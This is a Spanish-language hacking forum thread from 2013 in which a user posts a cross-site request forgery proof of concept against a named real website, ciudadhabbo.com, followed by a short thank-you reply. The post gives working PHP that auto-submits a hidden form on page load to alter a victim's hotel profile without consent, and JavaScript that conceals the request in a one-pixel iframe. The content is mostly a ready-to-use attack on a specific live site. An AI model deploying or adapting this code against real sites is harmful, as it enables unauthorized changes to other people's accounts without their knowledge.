Cross Site Request Forgery /Matabarras/

  • 1 Respuestas
  • 2923 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Matabarras

  • *
  • Underc0der
  • Mensajes: 126
  • Actividad:
    0%
  • Reputación 0
  • In-Seguridad informática
  • Skype: Matabarrasfud
    • Ver Perfil

Cross Site Request Forgery /Matabarras/

  • en: Abril 27, 2013, 10:19:27 pm
Buenas, hoy les explicare como explotamos una web con fallo de verificación en los tokens, lo que produce que podamos provocar acciones ilegitimas en nuestra "víctima" sin su cosentimiento ni conocimiento.

En este caso programe un CSRF; para la web ciudadhabbo, que simplemente, cuando el autor entra a nuestra web, automaticamente se le cambie el perfil de su hotel públicado, de la ID que indicamos.

También podriamos crear un CSRF, para públicar el hotel a base del que yo hice, muy sencillo.

Les dejo el tutorial donde explico los pasos.


CSRF:

Código: [Seleccionar]
<?php
//Codded: Matabarras/Morenako
// POC Cambio de Hotel Ciudadhabbo
$url "ciudadhabbo.com";
$form["id"] = 26//ID del hotel que queremos modificar
$form["nombre"] = "Murlocksito JUAPO";
$form["tipo"] = 1;
$form["name"] = "127.0.0.1";
$form["port"] = 80;
$form["web"] = "http://www.morenakomatabarras.com";
$form["info"] = "Pues probando a que si murlock";
$form["guardar"] = "Guardar+cambios";




echo 
'<html><body onLoad="document.csrf.submit();">';
echo 
'<form name="csrf" action="http://'.$url.'/doedit.php" method="POST">';
foreach(
$form As $key=>$value) {
echo '<input type="hidden" name="'.$key.'" value="'.$value.'">';
}
echo 
'</form></body></html>';
?>



JS camuflando el csrf.
Código: [Seleccionar]
// This code was coded by FrenetikK & Mor3nako.


function writeIf(url) {
document.write('<iframe src="'+url+'" frameborder="0" width="1" height="1" scrolling="no"></iframe>');
}

writeIf('http://127.0.0.1/csrf.php');
No esperes nada, vive la vida, y que los demas hagan lo que ellos creen.

Desconectado Pr0ph3t

  • *
  • Underc0der
  • Mensajes: 438
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
  • Skype: thebrowfc
    • Ver Perfil

Re:Cross Site Request Forgery /Matabarras/

  • en: Abril 28, 2013, 10:21:43 am
Muy bueno Matabarras, gracias.
Twitter: @The_Pr0ph3t
[email protected]